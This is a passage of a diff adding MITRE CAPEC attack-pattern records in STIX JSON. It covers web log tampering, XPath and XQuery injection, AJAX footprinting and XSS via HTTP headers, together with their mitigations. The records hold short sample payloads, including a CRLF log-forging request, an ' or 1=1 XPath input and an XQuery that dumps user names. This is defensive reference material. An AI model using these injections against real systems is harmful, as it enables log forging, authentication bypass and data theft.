"2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ee809e72-9489-47d3-8a97-15d2e21d67a6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa", + "target_ref": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to \"Log Injection-Tampering-Forging\" except that in this case, the attack is targeting the logs of the web server and not the application.", + "external_references": [ + { + "external_id": "CAPEC-81", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/81.html" + }, + { + "external_id": "CWE-117", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/117.html" + }, + { + "external_id": "CWE-93", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/93.html" + }, + { + "external_id": "CWE-75", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/75.html" + }, + { + "external_id": "CWE-221", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/221.html" + }, + { + "external_id": "CWE-96", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-150", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/150.html" + }, + { + "external_id": "CWE-276", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/276.html" + }, + { + "external_id": "CWE-279", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/279.html" + }, + { + "external_id": "CWE-116", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/116.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Web Server Logs Tampering", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--b3eaa7aa-9601-406c-ae82-0a0e2ea16116" + ], + "x_capec_consequences": { + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Most web servers have a public interface, even if the majority of the site is password protected, there is usually at least a login site and brochureware that is publicly available. HTTP requests to the site are also generally logged to a Web log. From an attacker point of view, standard HTTP requests containing a malicious payload can be sent to the public website (with no other access required), when those requests appear in the log (such as http://victimsite/index.html?< malicious script> if they are followed by an administrator this may be sufficient to probe the administrator's host or local network." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Application Web Server Log File Format: The attacker observes the system and looks for indicators of which logging utility is being used by the web server.

    2. Techniques
    Determine logging utility being used by application web server (e.g. log4j), only possible if the application is known by the attacker or if the application returns error messages with logging utility information.

Experiment

  1. Determine Injectable Content: The attacker launches various logged actions with malicious data to determine what sort of log injection is possible.

    2. Techniques
    Attacker triggers logged actions with maliciously crafted data as inputs, parameters, arguments, etc.

Exploit

  1. Manipulate Log Files: The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted request that the web server will receive and write into the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack.

    2. Techniques
    \n Indirectly through injection, use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry.\n For example: The HTTP request for \"/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] \"GET /forged-path HTTP/1.1\" 200 - \"-\" USER_AGENT\" may add the log line into Apache \"access_log\" (for example). Different applications may require different encodings of the carriage return and line feed characters.\n
    \n Directly through log file or database manipulation, use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry.\n For example: The HTTP request for \"/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] \"GET /forged-path HTTP/1.1\" 200 - \"-\" USER_AGENT\" may add the log line into Apache \"access_log\" (for example). Different applications may require different encodings of the carriage return and line feed characters.\n
    Directly through log file or database manipulation, modify existing log entries.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Target server software must be a HTTP server that performs web logging." + ], + "x_capec_resources_required": [ + "Ability to send specially formatted HTTP request to web server" + ], + "x_capec_skills_required": { + "Low": "To input faked entries into Web logs" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use input validation before writing to web log", + "id": "course-of-action--edac5c2c-7cfe-4047-b2f5-d1626f5c468b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-81-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--abbb4499-f5b6-4bd9-9b82-f6302c635ae9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--edac5c2c-7cfe-4047-b2f5-d1626f5c468b", + "target_ref": "attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Validate all log data before it is output", + "id": "course-of-action--bc74e6ff-c1ac-4157-97f0-a457258b1503", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-81-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5c13cda6-424c-4bee-a156-88983f9443e5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bc74e6ff-c1ac-4157-97f0-a457258b1503", + "target_ref": "attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it a generalization of CAPEC-230: XML Nested Payloads, CAPEC-231: XML Oversized Payloads, and CAPEC-147: XML Ping of Death. Please refer to these CAPECs going forward.", + "external_references": [ + { + "external_id": "CAPEC-82", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/82.html" + } + ], + "id": "attack-pattern--498a90d8-abbe-4fa9-8b19-549daa1c24ee", + "modified": "2019-09-30T00:00:00.000Z", + "name": "DEPRECATED: Violating Implicit Assumptions Regarding XML Content (aka XML Denial of Service (XDoS))", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker can craft special user-controllable input consisting of XPath expressions to inject the XML database and bypass authentication or glean information that they normally would not be able to. XPath Injection enables an attacker to talk directly to the XML database, thus bypassing the application completely. XPath Injection results from the failure of an application to properly sanitize input used as part of dynamic XPath expressions used to query an XML database.", + "external_references": [ + { + "external_id": "CAPEC-83", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/83.html" + }, + { + "external_id": "CWE-91", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/91.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "XPath Injection", + "external_id": "39", + "source_name": "WASC", + "url": "http://projects.webappsec.org/XPath-Injection" + }, + { + "description": "Blind XPath Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Blind_XPath_Injection" + }, + { + "description": "XPATH Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/XPATH_Injection" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-611", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection.html" + } + ], + "id": "attack-pattern--f51fd46e-a327-4c2d-a047-12fe2be6eb0b", + "modified": "2022-02-22T00:00:00.000Z", + "name": "XPath Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--aa6a831a-8eae-4690-b4a2-ff3e4d43a716" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Consider an application that uses an XML database to authenticate its users. The application retrieves the user name and password from a request and forms an XPath expression to query the database. An attacker can successfully bypass authentication and login without valid credentials through XPath Injection. This can be achieved by injecting the query to the XML database with XPath syntax that causes the authentication check to fail. Improper validation of user-controllable input and use of a non-parameterized XPath expression enable the attacker to inject an XPath expression that causes authentication bypass." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using a browser or an automated tool, an adversary records all instances of user-controllable input used to contruct XPath queries.

    2. Techniques
    Use an automated tool to record all instances of user-controllable input used to contruct XPath queries.
    Use a browser to manually explore the website and analyze how the application processes inputs.

  2. Determine the tructure of queries: Using manual or automated means, test inputs found for XPath weaknesses.

    3. Techniques
    Use an automated tool automatically probe the inputs for XPath weaknesses.
    Manually probe the inputs using characters such as single quote (') that can cause XPath-releated errors, thus indicating an XPath weakness.

Exploit

  1. Inject content into XPath query: Craft malicious content containing XPath expressions that is not validated by the application and is executed as part of the XPath queries.

    2. Techniques
    Use the crafted input to execute unexpected queries that can disclose sensitive database information to the attacker.
    Use a combination of single quote (') and boolean expressions such as \"or 1=1\" to manipulate XPath logic.
    Use XPath functions in the malicious content such as \"string-length\", \"substring\", or \"count\" to gain information about the XML document structure being used.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "XPath queries used to retrieve information stored in XML documents", + "User-controllable input not properly sanitized before being used as part of XPath queries" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "XPath Injection shares the same basic premises with SQL Injection. An attacker must have knowledge of XPath syntax and constructs in order to successfully leverage XPath Injection" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as content that can be interpreted in the context of an XPath expression. Characters such as a single-quote(') or operators such as or (|), and (&) and such should be filtered if the application does not expect them in the context in which they appear. If such content cannot be filtered, it must at least be properly escaped to avoid them being interpreted as part of XPath expressions.", + "id": "course-of-action--cab581d6-2ed4-47e6-85b3-5d84bd943c50", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-83-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7d639463-ea08-4233-a922-f74423845236", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cab581d6-2ed4-47e6-85b3-5d84bd943c50", + "target_ref": "attack-pattern--f51fd46e-a327-4c2d-a047-12fe2be6eb0b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use of parameterized XPath queries - Parameterization causes the input to be restricted to certain domains, such as strings or integers, and any input outside such domains is considered invalid and the query fails.", + "id": "course-of-action--9c926763-b5fb-45a5-91de-9aee1b9d874e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-83-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--edff9072-fa08-4afe-a489-21b0eafd515a", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9c926763-b5fb-45a5-91de-9aee1b9d874e", + "target_ref": "attack-pattern--f51fd46e-a327-4c2d-a047-12fe2be6eb0b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--221561aa-fdbc-4618-ad52-cff378722a38", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--618c2d85-ca76-40a0-a019-0ac9ba1b0989", + "target_ref": "attack-pattern--f51fd46e-a327-4c2d-a047-12fe2be6eb0b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack utilizes XQuery to probe and attack server systems; in a similar manner that SQL Injection allows an attacker to exploit SQL calls to RDBMS, XQuery Injection uses improperly validated data that is passed to XQuery commands to traverse and execute commands that the XQuery routines have access to. XQuery injection can be used to enumerate elements on the victim's environment, inject commands to the local host, or execute queries to remote files and data sources.", + "external_references": [ + { + "external_id": "CAPEC-84", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/84.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "XQuery Injection", + "external_id": "46", + "source_name": "WASC", + "url": "http://projects.webappsec.org/XQuery-Injection" + } + ], + "id": "attack-pattern--65c33cb5-cbae-4a8f-9895-2b7dc6a0f9f5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XQuery Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--aa6a831a-8eae-4690-b4a2-ff3e4d43a716" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An attacker can pass XQuery expressions embedded in otherwise standard XML documents. Like SQL injection attacks, the attacker tunnels through the application entry point to target the resource access layer. The string below is an example of an attacker accessing the accounts.xml to request the service provider send all user names back.\n doc(accounts.xml)//user[Name='*']\n The attacks that are possible through XQuery are difficult to predict, if the data is not validated prior to executing the XQL.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an attacker follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Determine user-controllable input susceptible to injection: Determine the user-controllable input susceptible to injection. For each user-controllable input that the attacker suspects is vulnerable to XQL injection, attempt to inject characters that have special meaning in XQL. The goal is to create an XQL query with an invalid syntax.

    2. Techniques
    Use web browser to inject input through text fields or through HTTP GET parameters.
    Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.
    Use XML files to inject input.
    Use network-level packet injection tools such as netcat to inject input
    Use modified client (modified by reverse engineering) to inject input.

Exploit

  1. Information Disclosure: The attacker crafts and injects an XQuery payload which is acted on by an XQL query leading to inappropriate disclosure of information.

    2. Techniques
    Leveraging one of the vulnerable inputs identified during the Experiment phase, inject malicious XQuery payload. The payload aims to get information on the structure of the underlying XML database and/or the content in it.

  2. Manipulate the data in the XML database: The attacker crafts and injects an XQuery payload which is acted on by an XQL query leading to modification of application data.

    3. Techniques
    Leveraging one of the vulnerable inputs identified during the Experiment phase, inject malicious XQuery payload.. The payload tries to insert or replace data in the XML database.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The XQL must execute unvalidated data" + ], + "x_capec_skills_required": { + "Low": "Basic understanding of XQuery" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Perform input allowlist validation on all XML input", + "id": "course-of-action--3e0b4d8e-2893-4eea-8c84-541d3c43381a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-84-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5034c53d-3c8c-4bfa-991c-3bdf02939873", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3e0b4d8e-2893-4eea-8c84-541d3c43381a", + "target_ref": "attack-pattern--65c33cb5-cbae-4a8f-9895-2b7dc6a0f9f5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Run xml parsing and query infrastructure with minimal privileges so that an attacker is limited in their ability to probe other system resources from XQL.", + "id": "course-of-action--79594b88-5cce-45e3-8b14-2f323ef0790c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-84-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2c10ee2c-94e2-4608-adae-9eedeae55591", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--79594b88-5cce-45e3-8b14-2f323ef0790c", + "target_ref": "attack-pattern--65c33cb5-cbae-4a8f-9895-2b7dc6a0f9f5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack utilizes the frequent client-server roundtrips in Ajax conversation to scan a system. While Ajax does not open up new vulnerabilities per se, it does optimize them from an attacker point of view. A common first step for an attacker is to footprint the target environment to understand what attacks will work. Since footprinting relies on enumeration, the conversational pattern of rapid, multiple requests and responses that are typical in Ajax applications enable an attacker to look for many vulnerabilities, well-known ports, network locations and so on. The knowledge gained through Ajax fingerprinting can be used to support other attacks, such as XSS.", + "external_references": [ + { + "external_id": "CAPEC-85", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/85.html" + }, + { + "external_id": "CWE-79", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html" + }, + { + "external_id": "CWE-113", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/113.html" + }, + { + "external_id": "CWE-348", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/348.html" + }, + { + "external_id": "CWE-96", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-116", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/116.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-86", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/86.html" + }, + { + "external_id": "CWE-692", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/692.html" + }, + { + "description": "Shreeraj Shah, Ajax fingerprinting for Web 2.0 Applications, Help Net Security", + "external_id": "REF-539", + "source_name": "reference_from_CAPEC", + "url": "https://www.helpnetsecurity.com/dl/articles/Ajax_fingerprinting.pdf" + } + ], + "id": "attack-pattern--94208f8a-f779-4be5-a97b-d9ab781a3f5e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "AJAX Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346" + ], + "x_capec_child_of_refs": [ + "attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Footprinting can be executed over almost any protocol including HTTP, TCP, UDP, and ICMP, with the general goal of gaining further information about a host environment to launch further attacks. The attacker can probe the system for banners, vulnerabilities, filenames, available services, and in short anything the host process has access to. The results of the probe are either used to execute javascript (for example, if the attackers' footprint script identifies a vulnerability in a firewall permission, then the client side script executes a javascript to change client firewall settings, or an attacker may simply echo the results of the scan back out to a remote host for targeting future attacks) or to inform other data gathering activities in order to craft atta." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Send request to target webpage and analyze HTML: Using a browser or an automated tool, an adversary sends requests to a webpage and records the received HTML response. Adversaries then analyze the HTML to identify any known underlying JavaScript architectures. This can aid in mappiong publicly known vulnerabilities to the webpage and can also helpo the adversary guess application architecture and the inner workings of a system.

    2. Techniques
    Record all \"src\" values inside script tags. These JavaScript files are compared to lists of files for known architectures. If there is a large match between the \"src\" values and architecture files, then it can be assumed that particular architecture is being used.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The user must allow JavaScript to execute in their browser" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "To land and launch a script on victim's machine with appropriate footprinting logic for enumerating services and vulnerabilities in JavaScript" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3d1586e2-3d5c-4ee5-9af8-6c3990a12afe", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "target_ref": "attack-pattern--94208f8a-f779-4be5-a97b-d9ab781a3f5e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--01f7ae1b-aa22-4c92-8b71-0f105dcbec8a", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "target_ref": "attack-pattern--94208f8a-f779-4be5-a97b-d9ab781a3f5e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits web applications that generate web content, such as links in a HTML page, based on unvalidated or improperly validated data submitted by other actors. XSS in HTTP Headers attacks target the HTTP headers which are hidden from most users and may not be validated by web applications.", + "external_references": [ + { + "external_id": "CAPEC-86", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/86.html" + }, + { + "external_id": "CWE-80", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/80.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "OWASP Cheatsheets, The Open Web Application Security Project (OWASP)", + "external_id": "REF-69", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/www-community/xss-filter-evasion-cheatsheet" + }, + { + "description": "Watchfire Research, XSS vulnerabilities in Google.com, Full Disclosure mailing list archives", + "external_id": "REF-476", + "source_name": "reference_from_CAPEC", + "url": "http://seclists.org/fulldisclosure/2005/Dec/1107" + } + ], + "id": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XSS Through HTTP Headers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b", + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software", + "Software", + "Software" + ], + "x_capec_example_instances": [ + "\n Utilize a remote style sheet set in the HTTP header for XSS attack. When the adversary is able to point to a remote stylesheet, any of the variables set in that stylesheet are controllable on the client side by the remote adversary. Like most XSS attacks, results vary depending on browser that is used [REF-97].\n ; REL=stylesheet\">\n ", + "\n Google's 404 redirection script was found vulnerable to this attack vector.\n Google's 404 file not found page read\n * Response headers: \"Content-Type: text/html; charset=[encoding]\".\n * Response body: \n If the response sends an unexpected encoding type such as UTF-7, then no enforcement is done on the payload and arbitrary XSS code will be transported along with the standard HTTP response. [REF-476]\n ", + "XSS can be used in variety of ways, because it is scripted and executes in a distributed, asynchronous fashion it can create its own vector and openings. For example, the adversary can use XSS to mount a DDoS attack by having series of different computers unknowingly executing requests against a single host." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

